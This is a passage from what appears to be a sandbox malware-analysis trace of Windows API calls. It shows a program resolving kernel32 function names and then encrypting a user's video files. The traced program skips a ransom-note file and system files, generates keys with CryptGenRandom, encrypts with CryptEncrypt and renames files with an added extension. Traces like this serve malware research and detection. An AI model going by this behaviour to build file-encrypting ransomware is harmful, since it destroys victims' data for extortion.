lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.516] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.516] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.516] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.516] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.516] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.516] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.516] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.516] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.516] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.516] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.516] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.516] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.516] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.516] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.516] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.516] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.517] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.517] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.517] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.517] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.517] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.517] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.517] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.517] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.517] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.517] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.517] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.517] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.517] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.517] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.517] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.517] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.517] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.517] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.517] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.518] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.518] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.518] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.518] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.518] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.518] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.518] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.518] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.518] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.518] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.518] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.518] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.518] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.518] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.518] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.518] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.518] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.518] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.518] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.518] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.519] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.519] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.519] lstrlenA (lpString="DELETEATOM") returned 10 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.519] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.519] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.519] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.519] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.519] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.519] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.519] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.519] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.519] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.519] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.519] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.519] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.519] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.519] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.519] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.519] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.520] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.520] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.520] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.520] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.520] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.520] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.520] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.520] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.520] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.520] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.520] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.520] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.520] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.520] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.520] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.520] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.520] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.520] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.520] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.521] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.521] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.521] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.521] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.521] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.521] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.521] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.521] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.521] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv") returned 64 [0087.521] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv.jIHLOI") returned 71 [0087.521] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rqiwec.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv.jIHLOI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rqiwec.flv.jihloi"), dwFlags=0x0) returned 1 [0087.522] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.522] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.522] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.523] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fefd820, ftCreationTime.dwHighDateTime=0x1d4cf83, ftLastAccessTime.dwLowDateTime=0xadfedae0, ftLastAccessTime.dwHighDateTime=0x1d4cf79, ftLastWriteTime.dwLowDateTime=0xadfedae0, ftLastWriteTime.dwHighDateTime=0x1d4cf79, nFileSizeHigh=0x0, nFileSizeLow=0x1dce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rw_rswFYcem6TM.mp4", cAlternateFileName="RW_RSW~1.MP4")) returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="autorun.inf") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="boot.ini") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="desktop.ini") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="ntuser.dat") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="iconcache.db") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="bootsect.bak") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="ntuser.dat.log") returned 1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="thumbs.db") returned -1 [0087.523] lstrcmpiW (lpString1="Rw_rswFYcem6TM.mp4", lpString2="Bootfont.bin") returned 1 [0087.523] lstrlenW (lpString="Rw_rswFYcem6TM.mp4") returned 18 [0087.523] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0087.523] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0087.523] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0087.523] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0087.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.523] lstrlenW (lpString="Rw_rswFYcem6TM.mp4") returned 18 [0087.523] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.523] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="Rw_rswFYcem6TM.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4" [0087.523] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\Rw_rswFYcem6TM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rw_rswfycem6tm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.524] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=7630) returned 1 [0087.524] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.524] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.524] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.524] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.524] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.524] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.525] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.525] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.525] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.525] CloseHandle (hObject=0x42c) returned 1 [0087.525] SetFilePointerEx (in: hFile=0x428, 